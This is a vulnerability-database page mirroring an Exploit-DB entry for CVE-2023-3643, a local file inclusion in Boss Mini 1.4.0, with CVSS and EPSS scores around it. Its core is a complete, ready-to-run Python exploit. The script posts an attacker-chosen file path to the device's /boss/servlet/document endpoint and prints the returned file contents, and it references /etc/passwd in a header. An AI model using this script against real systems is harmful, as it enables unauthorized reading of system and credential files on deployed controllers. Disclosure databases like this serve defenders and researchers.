Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbNltt0EDB-ID:51848
HistoryMar 03, 2024 - 12:00 a.m.

Boss Mini 1.4.0 - local file inclusion

2024-03-0300:00:00
nltt0
www.exploit-db.com
96
exploit
boss mini
local file inclusion
cve-2023-3643
python
requests
argumentparser
urllib
host header
user-agent header
content-type header
accept header
referer header
post request
verify parameter

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

30.9%

JSON
# Exploit Title: Boss Mini 1.4.0 - local file inclusion
# Date: 07/12/2023
# Exploit Author: [nltt0] (https://github.com/nltt-br))
# CVE: CVE-2023-3643


'''
 _____       _                              _____ 
/  __ \     | |                            /  ___|
| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--. 
| |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
 \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ 
                            __/ |                 
                           |___/                  

'''

from requests import post 
from urllib.parse import quote
from argparse import ArgumentParser

try:
    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')
    parser.add_argument('--domain', required=True, help='Application domain')
    parser.add_argument('--file', required=True, help='Local file')

    args = parser.parse_args()
    host = args.domain
    file = args.file
    url = '{}/boss/servlet/document'.format(host)
    file2 = quote(file, safe='')

    headers = {
        'Host': host,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',
        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)
    }


    data = {
        'path': file2
    }

    try:
        req = post(url, headers=headers, data=data, verify=False)
        if req.status_code == 200:
            print(req.text)

    except Exception as e:
        print('Error in {}'.format(e))   
       

except Exception as e:
    print('Error in {}'.format(e))

Related

zdt 1
packetstorm 1
cve 1
prion 1
cvelist 1
nvd 1
ics 1
zdt
zdt
Boss Mini 1.4.0 - local file inclusion Exploit
2024-03-04 00:00:00
packetstorm
packetstorm
Boss Mini 1.4.0 Local File Inclusion
2024-03-04 00:00:00
cve
cve
CVE-2023-3643
2023-07-12 18:15:09
prion
prion
Design/Logic Flaw
2023-07-12 18:15:00
cvelist
cvelist
CVE-2023-3643 Boss Mini document file inclusion
2023-07-12 17:31:03
nvd
nvd
CVE-2023-3643
2023-07-12 18:15:09
ics
ics
CAREL Boss-Mini
2024-06-20 12:00:00

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

30.9%

JSON
Related for EDB-ID:51848
zdt1packetstorm1cve1prion1cvelist1nvd1ics1